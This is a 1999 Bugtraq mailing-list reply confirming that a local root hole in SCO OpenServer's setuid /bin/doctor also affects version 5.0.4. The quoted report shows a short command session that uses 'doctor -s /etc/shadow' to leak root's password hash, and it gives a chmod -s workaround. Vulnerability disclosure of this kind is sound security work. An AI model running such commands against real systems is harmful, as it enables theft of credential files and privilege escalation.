=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


    Date: Ср, 08 сен 1999  22:31:57

   От: Seth R Arnold <sarnold@WILLAMETTE.EDU>

 Кому: BUGTRAQ@SECURITYFOCUS.COM

 Тема: Re: SCO 5.0.5 /bin/doctor local root comprimise

--------------------------------------------------------------------------------




confirmed to run under 5.0.4 as well.



On Fri, Sep 03, 1999 at 05:20:17PM -0500, Brock Tellier wrote:

> Greetings,

>

>

> INFO:

>  There is a local root comprimise in SCO 5.0.5's /bin/doctor 2.0.0e2 and probably others.  By supplying a doctor script file you can read the first partial line of any file on the system (good enough for /etc/shadow).  Example:

>

> scobox:/bin$ id

> uid=136(btellier),200(users)

> scobox:/bin$ uname -a

> SCO_SV scobox 3.2 5.0.5 i386

> scobox:/bin$ doctor -V

> doctor 2.0.0e 2

> scobox:/bin$ doctor -s /etc/shadow

> doctor: WARNING User message: invalid command name "root:xbfOLR0ekXN/o:10656::"

> scobox:/bin$

>

> And so on.

>

> FIX:

>  Just chmod -s until SCO comes out with a fix.  Although I certianly won't be changing it back to suid root anytime soon.  If a hole like this exists, there are undoubtedly countless more lurking within.

>

> Brock Tellier

> Systems Administrator

> Webley Systems



--

Seth Arnold | http://www.willamette.edu/~sarnold/

Hate spam? See http://maps.vix.com/rbl/ for help

Hi! I'm a .signature virus! Copy me into

your ~/.signature to help me spread!